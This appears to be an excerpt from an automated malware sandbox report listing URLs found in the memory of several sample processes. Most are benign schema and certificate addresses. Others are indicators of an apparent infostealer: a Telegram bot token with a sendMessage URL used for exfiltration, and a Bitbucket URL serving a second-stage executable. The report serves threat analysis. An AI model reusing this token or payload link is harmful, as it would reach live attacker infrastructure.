                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: powershell.exe, 0000000C.00000002.2256262756.000001D700001000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/D
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id1
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id10
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id11
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id12
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id13
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id14
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id15
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id16
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id17
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id18
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id19
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id20
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id21
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9
Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 68f6adf5d5.exe, 00000018.00000003.2434961195.0000017A8A9FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://accounts.googl
Source: 68f6adf5d5.exe, 00000019.00000003.2467666649.0000020F23CC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com
Source: 68f6adf5d5.exe, 00000019.00000003.2467666649.0000020F23CC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com:443
Source: 0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: 0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: 0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: powershell.exe, 0000000C.00000002.2256262756.000001D700001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: 0a7e8af92e.exe, 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/
Source: 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
Source: 68f6adf5d5.exe, 00000018.00000002.2602154875.0000017A8C7E0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0oQn
Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: https://api.telegram.org/botFailed
Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/dWPv7(
Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/z
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: 7620ab885d.exe | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.f
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: 7620ab885d.exe | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: 7620ab885d.exe | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.pro
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2488024648.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.netP
Source: 7620ab885d.exe | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.publi
Source: 7620ab885d.exe | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367220698.0000000000C15000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: 7620ab885d.exe, 00000009.00000002.2465242779.000000000098A000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
Source: 7620ab885d.exe, 00000009.00000002.2467266806.0000000000B83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeYBj
Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
